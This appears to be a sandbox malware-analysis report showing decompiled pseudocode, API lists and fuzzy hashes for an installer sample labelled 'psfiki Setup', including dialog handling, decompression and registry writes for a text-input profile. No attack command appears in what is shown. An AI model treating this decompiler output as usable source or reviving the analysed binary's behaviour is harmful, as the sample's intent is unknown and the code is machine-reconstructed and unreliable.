                                          					_a28 = _t267;
                                          					_t234 = 0xf;
                                          					while(1) {
                                          						_t168 = 0;
                                          						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                          							break;
                                          						}
                                          						_t190 = _t190 + 1;
                                          						if(_t190 <= _t234) {
                                          							continue;
                                          						}
                                          						break;
                                          					}
                                          					_v8 = _t190;
                                          					if(_t267 < _t190) {
                                          						_a28 = _t190;
                                          					}
                                          					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                          						_t234 = _t234 - 1;
                                          						if(_t234 != 0) {
                                          							continue;
                                          						}
                                          						break;
                                          					}
                                          					_v28 = _t234;
                                          					if(_a28 > _t234) {
                                          						_a28 = _t234;
                                          					}
                                          					 *_t279 = _a28;
                                          					_t181 = 1 << _t190;
                                          					while(_t190 < _t234) {
                                          						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                          						if(_t182 < 0) {
                                          							L64:
                                          							return _t168 | 0xffffffff;
                                          						}
                                          						_t190 = _t190 + 1;
                                          						_t181 = _t182 + _t182;
                                          					}
                                          					_t281 = _t234 << 2;
                                          					_t191 = _t299 + _t281 - 0x70;
                                          					_t269 =  *_t191;
                                          					_t183 = _t181 - _t269;
                                          					_v52 = _t183;
                                          					if(_t183 < 0) {
                                          						goto L64;
                                          					}
                                          					_v176 = _t168;
                                          					 *_t191 = _t269 + _t183;
                                          					_t192 = 0;
                                          					_t235 = _t234 - 1;
                                          					if(_t235 == 0) {
                                          						L21:
                                          						_t184 = _a4;
                                          						_t271 = 0;
                                          						do {
                                          							_t193 =  *_t184;
                                          							_t184 =  &(_t184[1]);
                                          							if(_t193 != _t168) {
                                          								_t232 = _t299 + _t193 * 4 - 0xb0;
                                          								_t236 =  *_t232;
                                          								 *((intOrPtr*)(0x42cdf0 + _t236 * 4)) = _t271;
                                          								 *_t232 = _t236 + 1;
                                          							}
                                          							_t271 = _t271 + 1;
                                          						} while (_t271 < _a8);
                                          						_v16 = _v16 | 0xffffffff;
                                          						_v40 = _v40 & 0x00000000;
                                          						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                          						_t195 = _v8;
                                          						_t186 =  ~_a28;
                                          						_v12 = _t168;
                                          						_v180 = _t168;
                                          						_v36 = 0x42cdf0;
                                          						_v240 = _t168;
                                          						if(_t195 > _v28) {
                                          							L62:
                                          							_t168 = 0;
                                          							if(_v52 == 0 || _v28 == 1) {
                                          								return _t168;
                                          							} else {
                                          								goto L64;
                                          							}
                                          						}
                                          						_v44 = _t195 - 1;
                                          						_v32 = _t299 + _t195 * 4 - 0x70;
                                          						do {
                                          							_t282 =  *_v32;
                                          							if(_t282 == 0) {
                                          								goto L61;
                                          							}
                                          							while(1) {
                                          								_t283 = _t282 - 1;
                                          								_t200 = _a28 + _t186;
                                          								_v48 = _t283;
                                          								_v24 = _t200;
                                          								if(_v8 <= _t200) {
                                          									goto L45;
                                          								}
                                          								L31:
                                          								_v20 = _t283 + 1;
                                          								do {
                                          									_v16 = _v16 + 1;
                                          									_t296 = _v28 - _v24;
                                          									if(_t296 > _a28) {
                                          										_t296 = _a28;
                                          									}
                                          									_t222 = _v8 - _v24;
                                          									_t254 = 1 << _t222;
                                          									if(1 <= _v20) {
                                          										L40:
                                          										_t256 =  *_a36;
                                          										_t168 = 1 << _t222;
                                          										_v40 = 1;
                                          										_t274 = _t256 + 1;
                                          										if(_t274 > 0x5a0) {
                                          											goto L64;
                                          										}
                                          									} else {
                                          										_t275 = _v32;
                                          										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                          										if(_t222 >= _t296) {
                                          											goto L40;
                                          										}
                                          										while(1) {
                                          											_t222 = _t222 + 1;
                                          											if(_t222 >= _t296) {
                                          												goto L40;
                                          											}
                                          											_t275 = _t275 + 4;
                                          											_t264 = _t263 + _t263;
                                          											_t175 =  *_t275;
                                          											if(_t264 <= _t175) {
                                          												goto L40;
                                          											}
                                          											_t263 = _t264 - _t175;
                                          										}
                                          										goto L40;
                                          									}
                                          									_t168 = _a32 + _t256 * 4;
                                          									_t297 = _t299 + _v16 * 4 - 0xec;
                                          									 *_a36 = _t274;
                                          									_t259 = _v16;
                                          									 *_t297 = _t168;
                                          									if(_t259 == 0) {
                                          										 *_a24 = _t168;
                                          									} else {
                                          										_t276 = _v12;
                                          										_t298 =  *((intOrPtr*)(_t297 - 4));
                                          										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                          										_a5 = _a28;
                                          										_a4 = _t222;
                                          										_t262 = _t276 >> _t186;
                                          										_a6 = (_t168 - _t298 >> 2) - _t262;
                                          										 *(_t298 + _t262 * 4) = _a4;
                                          									}
                                          									_t224 = _v24;
                                          									_t186 = _t224;
                                          									_t225 = _t224 + _a28;
                                          									_v24 = _t225;
                                          								} while (_v8 > _t225);
                                          								L45:
                                          								_t284 = _v36;
                                          								_a5 = _v8 - _t186;
                                          								if(_t284 < 0x42cdf0 + _a8 * 4) {
                                          									_t205 =  *_t284;
                                          									if(_t205 >= _a12) {
                                          										_t207 = _t205 - _a12 + _t205 - _a12;
                                          										_v36 =  &(_v36[1]);
                                          										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                          										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                          									} else {
                                          										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                          										_t208 =  *_t284;
                                          										_v36 =  &(_t284[1]);
                                          									}
                                          									_a6 = _t208;
                                          								} else {
                                          									_a4 = 0xc0;
                                          								}
                                          								_t286 = 1 << _v8 - _t186;
                                          								_t244 = _v12 >> _t186;
                                          								while(_t244 < _v40) {
                                          									 *(_t168 + _t244 * 4) = _a4;
                                          									_t244 = _t244 + _t286;
                                          								}
                                          								_t287 = _v12;
                                          								_t246 = 1 << _v44;
                                          								while((_t287 & _t246) != 0) {
                                          									_t287 = _t287 ^ _t246;
                                          									_t246 = _t246 >> 1;
                                          								}
                                          								_t288 = _t287 ^ _t246;
                                          								_v20 = 1;
                                          								_v12 = _t288;
                                          								_t251 = _v16;
                                          								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                          									L60:
                                          									if(_v48 != 0) {
                                          										_t282 = _v48;
                                          										_t283 = _t282 - 1;
                                          										_t200 = _a28 + _t186;
                                          										_v48 = _t283;
                                          										_v24 = _t200;
                                          										if(_v8 <= _t200) {
                                          											goto L45;
                                          										}
                                          										goto L31;
                                          									}
                                          									break;
                                          								} else {
                                          									goto L58;
                                          								}
                                          								do {
                                          									L58:
                                          									_t186 = _t186 - _a28;
                                          									_t251 = _t251 - 1;
                                          								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                          								_v16 = _t251;
                                          								goto L60;
                                          							}
                                          							L61:
                                          							_v8 = _v8 + 1;
                                          							_v32 = _v32 + 4;
                                          							_v44 = _v44 + 1;
                                          						} while (_v8 <= _v28);
                                          						goto L62;
                                          					}
                                          					_t277 = 0;
                                          					do {
                                          						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                          						_t277 = _t277 + 4;
                                          						_t235 = _t235 - 1;
                                          						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                          					} while (_t235 != 0);
                                          					goto L21;
                                          				}
                                          				 *_a24 =  *_a24 & 0x00000000;
                                          				 *_a28 =  *_a28 & 0x00000000;
                                          				return 0;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                                          • Instruction ID: 233014ff28be9fca5e40c1aeee1244862099a57bf12043c09a7623bfee50ec27
                                          • Opcode Fuzzy Hash: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                                          • Instruction Fuzzy Hash: D0C13B71A00259CBCF14DF68C4905EEB7B2FF99314F26826AD856B7380D734A952CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E0040380A(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                          				struct HWND__* _v32;
                                          				void* _v84;
                                          				void* _v88;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t35;
                                          				signed int _t37;
                                          				signed int _t39;
                                          				intOrPtr _t44;
                                          				struct HWND__* _t49;
                                          				signed int _t67;
                                          				struct HWND__* _t73;
                                          				signed int _t86;
                                          				struct HWND__* _t91;
                                          				signed int _t99;
                                          				int _t103;
                                          				signed int _t115;
                                          				signed int _t116;
                                          				int _t117;
                                          				signed int _t122;
                                          				struct HWND__* _t125;
                                          				struct HWND__* _t126;
                                          				int _t127;
                                          				long _t130;
                                          				int _t132;
                                          				int _t133;
                                          				void* _t134;
                                          				void* _t142;
                                          
                                          				_t115 = _a8;
                                          				if(_t115 == 0x110 || _t115 == 0x408) {
                                          					_t35 = _a12;
                                          					_t125 = _a4;
                                          					__eflags = _t115 - 0x110;
                                          					 *0x429fbc = _t35;
                                          					if(_t115 == 0x110) {
                                          						 *0x42eb68 = _t125;
                                          						 *0x429fd0 = GetDlgItem(_t125, 1);
                                          						_t91 = GetDlgItem(_t125, 2);
                                          						_push(0xffffffff);
                                          						_push(0x1c);
                                          						 *0x428f98 = _t91;
                                          						E00403CDD(_t125);
                                          						SetClassLongA(_t125, 0xfffffff2,  *0x42e348);
                                          						 *0x42e32c = E0040140B(4);
                                          						_t35 = 1;
                                          						__eflags = 1;
                                          						 *0x429fbc = 1;
                                          					}
                                          					_t122 =  *0x40919c; // 0xffffffff
                                          					_t133 = 0;
                                          					_t130 = (_t122 << 6) +  *0x42eb80;
                                          					__eflags = _t122;
                                          					if(_t122 < 0) {
                                          						L34:
                                          						E00403D29(0x40b);
                                          						while(1) {
                                          							_t37 =  *0x429fbc;
                                          							 *0x40919c =  *0x40919c + _t37;
                                          							_t130 = _t130 + (_t37 << 6);
                                          							_t39 =  *0x40919c; // 0xffffffff
                                          							__eflags = _t39 -  *0x42eb84; // 0x2
                                          							if(__eflags == 0) {
                                          								E0040140B(1);
                                          							}
                                          							__eflags =  *0x42e32c - _t133; // 0x0
                                          							if(__eflags != 0) {
                                          								break;
                                          							}
                                          							_t44 =  *0x42eb84; // 0x2
                                          							__eflags =  *0x40919c - _t44; // 0xffffffff
                                          							if(__eflags >= 0) {
                                          								break;
                                          							}
                                          							_t116 =  *(_t130 + 0x14);
                                          							E0040594D(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
                                          							_push( *((intOrPtr*)(_t130 + 0x20)));
                                          							_push(0xfffffc19);
                                          							E00403CDD(_t125);
                                          							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                          							_push(0xfffffc1b);
                                          							E00403CDD(_t125);
                                          							_push( *((intOrPtr*)(_t130 + 0x28)));
                                          							_push(0xfffffc1a);
                                          							E00403CDD(_t125);
                                          							_t49 = GetDlgItem(_t125, 3);
                                          							__eflags =  *0x42ebec - _t133; // 0x0
                                          							_v32 = _t49;
                                          							if(__eflags != 0) {
                                          								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                          								__eflags = _t116;
                                          							}
                                          							ShowWindow(_t49, _t116 & 0x00000008);
                                          							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                          							E00403CFF(_t116 & 0x00000002);
                                          							_t117 = _t116 & 0x00000004;
                                          							EnableWindow( *0x428f98, _t117);
                                          							__eflags = _t117 - _t133;
                                          							if(_t117 == _t133) {
                                          								_push(1);
                                          							} else {
                                          								_push(_t133);
                                          							}
                                          							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                          							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                          							__eflags =  *0x42ebec - _t133; // 0x0
                                          							if(__eflags == 0) {
                                          								_push( *0x429fd0);
                                          							} else {
                                          								SendMessageA(_t125, 0x401, 2, _t133);
                                          								_push( *0x428f98);
                                          							}
                                          							E00403D12();
                                          							E0040592B(0x429fd8, "psfiki Setup");
                                          							E0040594D(0x429fd8, _t125, _t130,  &(0x429fd8[lstrlenA(0x429fd8)]),  *((intOrPtr*)(_t130 + 0x18)));
                                          							SetWindowTextA(_t125, 0x429fd8);
                                          							_push(_t133);
                                          							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                          							__eflags = _t67;
                                          							if(_t67 != 0) {
                                          								continue;
                                          							} else {
                                          								__eflags =  *_t130 - _t133;
                                          								if( *_t130 == _t133) {
                                          									continue;
                                          								}
                                          								__eflags =  *(_t130 + 4) - 5;
                                          								if( *(_t130 + 4) != 5) {
                                          									DestroyWindow( *0x42e338);
                                          									 *0x4297a8 = _t130;
                                          									__eflags =  *_t130 - _t133;
                                          									if( *_t130 <= _t133) {
                                          										goto L58;
                                          									}
                                          									_t73 = CreateDialogParamA( *0x42eb60,  *_t130 +  *0x42e340 & 0x0000ffff, _t125,  *(0x4091a0 +  *(_t130 + 4) * 4), _t130);
                                          									__eflags = _t73 - _t133;
                                          									 *0x42e338 = _t73;
                                          									if(_t73 == _t133) {
                                          										goto L58;
                                          									}
                                          									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                          									_push(6);
                                          									E00403CDD(_t73);
                                          									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                          									ScreenToClient(_t125, _t134 + 0x10);
                                          									SetWindowPos( *0x42e338, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                          									_push(_t133);
                                          									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                          									__eflags =  *0x42e32c - _t133; // 0x0
                                          									if(__eflags != 0) {
                                          										goto L61;
                                          									}
                                          									ShowWindow( *0x42e338, 8);
                                          									E00403D29(0x405);
                                          									goto L58;
                                          								}
                                          								__eflags =  *0x42ebec - _t133; // 0x0
                                          								if(__eflags != 0) {
                                          									goto L61;
                                          								}
                                          								__eflags =  *0x42ebe0 - _t133; // 0x0
                                          								if(__eflags != 0) {
                                          									continue;
                                          								}
                                          								goto L61;
                                          							}
                                          						}
                                          						DestroyWindow( *0x42e338);
                                          						 *0x42eb68 = _t133;
                                          						EndDialog(_t125,  *0x4293a0);
                                          						goto L58;
                                          					} else {
                                          						__eflags = _t35 - 1;
                                          						if(_t35 != 1) {
                                          							L33:
                                          							__eflags =  *_t130 - _t133;
                                          							if( *_t130 == _t133) {
                                          								goto L61;
                                          							}
                                          							goto L34;
                                          						}
                                          						_push(0);
                                          						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                          						__eflags = _t86;
                                          						if(_t86 == 0) {
                                          							goto L33;
                                          						}
                                          						SendMessageA( *0x42e338, 0x40f, 0, 1);
                                          						__eflags =  *0x42e32c - _t133; // 0x0
                                          						return 0 | __eflags == 0x00000000;
                                          					}
                                          				} else {
                                          					_t125 = _a4;
                                          					_t133 = 0;
                                          					if(_t115 == 0x47) {
                                          						SetWindowPos( *0x429fb0, _t125, 0, 0, 0, 0, 0x13);
                                          					}
                                          					if(_t115 == 5) {
                                          						asm("sbb eax, eax");
                                          						ShowWindow( *0x429fb0,  ~(_a12 - 1) & _t115);
                                          					}
                                          					if(_t115 != 0x40d) {
                                          						__eflags = _t115 - 0x11;
                                          						if(_t115 != 0x11) {
                                          							__eflags = _t115 - 0x111;
                                          							if(_t115 != 0x111) {
                                          								L26:
                                          								return E00403D44(_t115, _a12, _a16);
                                          							}
                                          							_t132 = _a12 & 0x0000ffff;
                                          							_t126 = GetDlgItem(_t125, _t132);
                                          							__eflags = _t126 - _t133;
                                          							if(_t126 == _t133) {
                                          								L13:
                                          								__eflags = _t132 - 1;
                                          								if(_t132 != 1) {
                                          									__eflags = _t132 - 3;
                                          									if(_t132 != 3) {
                                          										_t127 = 2;
                                          										__eflags = _t132 - _t127;
                                          										if(_t132 != _t127) {
                                          											L25:
                                          											SendMessageA( *0x42e338, 0x111, _a12, _a16);
                                          											goto L26;
                                          										}
                                          										__eflags =  *0x42ebec - _t133; // 0x0
                                          										if(__eflags == 0) {
                                          											_t99 = E0040140B(3);
                                          											__eflags = _t99;
                                          											if(_t99 != 0) {
                                          												goto L26;
                                          											}
                                          											 *0x4293a0 = 1;
                                          											L21:
                                          											_push(0x78);
                                          											L22:
                                          											E00403CB6();
                                          											goto L26;
                                          										}
                                          										E0040140B(_t127);
                                          										 *0x4293a0 = _t127;
                                          										goto L21;
                                          									}
                                          									__eflags =  *0x40919c - _t133; // 0xffffffff
                                          									if(__eflags <= 0) {
                                          										goto L25;
                                          									}
                                          									_push(0xffffffff);
                                          									goto L22;
                                          								}
                                          								_push(_t132);
                                          								goto L22;
                                          							}
                                          							SendMessageA(_t126, 0xf3, _t133, _t133);
                                          							_t103 = IsWindowEnabled(_t126);
                                          							__eflags = _t103;
                                          							if(_t103 == 0) {
                                          								goto L61;
                                          							}
                                          							goto L13;
                                          						}
                                          						SetWindowLongA(_t125, _t133, _t133);
                                          						return 1;
                                          					} else {
                                          						DestroyWindow( *0x42e338);
                                          						 *0x42e338 = _a12;
                                          						L58:
                                          						if( *0x42afd8 == _t133) {
                                          							_t142 =  *0x42e338 - _t133; // 0x0
                                          							if(_t142 != 0) {
                                          								ShowWindow(_t125, 0xa);
                                          								 *0x42afd8 = 1;
                                          							}
                                          						}
                                          						L61:
                                          						return 0;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403846
                                          • ShowWindow.USER32(?), ref: 00403863
                                          • DestroyWindow.USER32 ref: 00403877
                                          • SetWindowLongA.USER32 ref: 00403893
                                          • GetDlgItem.USER32(?,?), ref: 004038B4
                                          • SendMessageA.USER32 ref: 004038C8
                                          • IsWindowEnabled.USER32(00000000), ref: 004038CF
                                          • GetDlgItem.USER32(?,00000001), ref: 0040397D
                                          • GetDlgItem.USER32(?,00000002), ref: 00403987
                                          • SetClassLongA.USER32(?,000000F2,?), ref: 004039A1
                                          • SendMessageA.USER32 ref: 004039F2
                                          • GetDlgItem.USER32(?,00000003), ref: 00403A98
                                          • ShowWindow.USER32(00000000,?), ref: 00403AB9
                                          • EnableWindow.USER32(?,?), ref: 00403ACB
                                          • EnableWindow.USER32(?,?), ref: 00403AE6
                                          • GetSystemMenu.USER32 ref: 00403AFC
                                          • EnableMenuItem.USER32 ref: 00403B03
                                          • SendMessageA.USER32 ref: 00403B1B
                                          • SendMessageA.USER32 ref: 00403B2E
                                          • lstrlenA.KERNEL32(00429FD8,?,00429FD8,psfiki Setup), ref: 00403B57
                                          • SetWindowTextA.USER32(?,00429FD8), ref: 00403B66
                                          • ShowWindow.USER32(?,0000000A), ref: 00403C9A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                          • String ID: psfiki Setup
                                          • API String ID: 184305955-2728070757
                                          • Opcode ID: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                          • Instruction ID: 5403acdcc1aa6bbc142bc1e7719ab292303190a86846970e4bd25be8090c7a94
                                          • Opcode Fuzzy Hash: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                          • Instruction Fuzzy Hash: DCC1B471A08204ABEB21AF62ED85E2B7E6CFB45706F40043EF541B51E1C779A942DF1E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E00403E25(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                          				char* _v8;
                                          				signed int _v12;
                                          				void* _v16;
                                          				struct HWND__* _t52;
                                          				intOrPtr _t71;
                                          				intOrPtr _t85;
                                          				long _t86;
                                          				int _t98;
                                          				struct HWND__* _t99;
                                          				signed int _t100;
                                          				intOrPtr _t107;
                                          				intOrPtr _t109;
                                          				int _t110;
                                          				signed int* _t112;
                                          				signed int _t113;
                                          				char* _t114;
                                          				CHAR* _t115;
                                          
                                          				if(_a8 != 0x110) {
                                          					if(_a8 != 0x111) {
                                          						L11:
                                          						if(_a8 != 0x4e) {
                                          							if(_a8 == 0x40b) {
                                          								 *0x429fb8 =  *0x429fb8 + 1;
                                          							}
                                          							L25:
                                          							_t110 = _a16;
                                          							L26:
                                          							return E00403D44(_a8, _a12, _t110);
                                          						}
                                          						_t52 = GetDlgItem(_a4, 0x3e8);
                                          						_t110 = _a16;
                                          						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                          							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                          							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                          							_v12 = _t100;
                                          							_v16 = _t109;
                                          							_v8 = 0x42db00;
                                          							if(_t100 - _t109 < 0x800) {
                                          								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                          								SetCursor(LoadCursorA(0, 0x7f02));
                                          								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                          								SetCursor(LoadCursorA(0, 0x7f00));
                                          								_t110 = _a16;
                                          							}
                                          						}
                                          						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                          							goto L26;
                                          						} else {
                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                          								SendMessageA( *0x42eb68, 0x111, 1, 0);
                                          							}
                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                          								SendMessageA( *0x42eb68, 0x10, 0, 0);
                                          							}
                                          							return 1;
                                          						}
                                          					}
                                          					if(_a12 >> 0x10 != 0 ||  *0x429fb8 != 0) {
                                          						goto L25;
                                          					} else {
                                          						_t112 =  *0x4297a8 + 0x14;
                                          						if(( *_t112 & 0x00000020) == 0) {
                                          							goto L25;
                                          						}
                                          						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                          						E00403CFF(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                          						E004040B0();
                                          						goto L11;
                                          					}
                                          				}
                                          				_t98 = _a16;
                                          				_t113 =  *(_t98 + 0x30);
                                          				if(_t113 < 0) {
                                          					_t107 =  *0x42e33c; // 0x294de4
                                          					_t113 =  *(_t107 - 4 + _t113 * 4);
                                          				}
                                          				_t71 =  *0x42eb98; // 0x2939c0
                                          				_push( *((intOrPtr*)(_t98 + 0x34)));
                                          				_t114 = _t113 + _t71;
                                          				_push(0x22);
                                          				_a16 =  *_t114;
                                          				_v12 = _v12 & 0x00000000;
                                          				_t115 = _t114 + 1;
                                          				_v16 = _t115;
                                          				_v8 = E00403DF1;
                                          				E00403CDD(_a4);
                                          				_push( *((intOrPtr*)(_t98 + 0x38)));
                                          				_push(0x23);
                                          				E00403CDD(_a4);
                                          				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                          				E00403CFF( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                          				_t99 = GetDlgItem(_a4, 0x3e8);
                                          				E00403D12(_t99);
                                          				SendMessageA(_t99, 0x45b, 1, 0);
                                          				_t85 =  *0x42eb70; // 0x2903c0
                                          				_t86 =  *(_t85 + 0x68);
                                          				if(_t86 < 0) {
                                          					_t86 = GetSysColor( ~_t86);
                                          				}
                                          				SendMessageA(_t99, 0x443, 0, _t86);
                                          				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                          				 *0x428f9c =  *0x428f9c & 0x00000000;
                                          				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                          				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                          				 *0x429fb8 =  *0x429fb8 & 0x00000000;
                                          				return 0;
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                          • String ID: N$hnahgvbse$open$M)
                                          • API String ID: 3615053054-3657911301
                                          • Opcode ID: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                          • Instruction ID: ff75cf5183ce2723ba3e9af3fd3b1123c83c1709a93184edc862a5803e63a157
                                          • Opcode Fuzzy Hash: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                          • Instruction Fuzzy Hash: 3861CEB1A40209BFEB109F60CD45F6A7B69EB44715F10843AFB05BA2D1C7B8AD51CF98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100018CF
                                          • RegOpenKeyExW.ADVAPI32 ref: 10001919
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 10001937
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 1000198F
                                          • RegSetValueExW.ADVAPI32 ref: 100019C0
                                          • RegSetValueExW.ADVAPI32 ref: 100019DD
                                          • RegSetValueExW.ADVAPI32 ref: 100019F6
                                          • RegSetValueExW.ADVAPI32 ref: 10001A15
                                          • RegCloseKey.ADVAPI32(?), ref: 10001A1F
                                          • RegCloseKey.ADVAPI32(?), ref: 10001A3E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Value$CloseFromString$CreateOpen
                                          • String ID: %s\%s$%s\0x%08x\%s$(%p) %s %x %s %s %s %i$Description$Enable$IconFile$IconIndex$LanguageProfile
                                          • API String ID: 4095516225-583810935
                                          • Opcode ID: 95976a421422a20a8cc6552d434b7bb570f3f0fe06f6745a94ba95c66ca77696
                                          • Instruction ID: f5b3e520962a4341d797bc7b62084b8a20064c24fd2a0bb7a6012bcb4da69b6a
                                          • Opcode Fuzzy Hash: 95976a421422a20a8cc6552d434b7bb570f3f0fe06f6745a94ba95c66ca77696
                                          • Instruction Fuzzy Hash: A6511CB6A10208BBEB14DF94DD85FEF73B9EB48744F008508F709A6185D774EA84CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                          				struct tagLOGBRUSH _v16;
                                          				struct tagRECT _v32;
                                          				struct tagPAINTSTRUCT _v96;
                                          				struct HDC__* _t70;
                                          				struct HBRUSH__* _t87;
                                          				struct HFONT__* _t94;
                                          				long _t102;
                                          				intOrPtr _t115;
                                          				signed int _t126;
                                          				struct HDC__* _t128;
                                          				intOrPtr _t130;
                                          
                                          				if(_a8 == 0xf) {
                                          					_t130 =  *0x42eb70; // 0x2903c0
                                          					_t70 = BeginPaint(_a4,  &_v96);
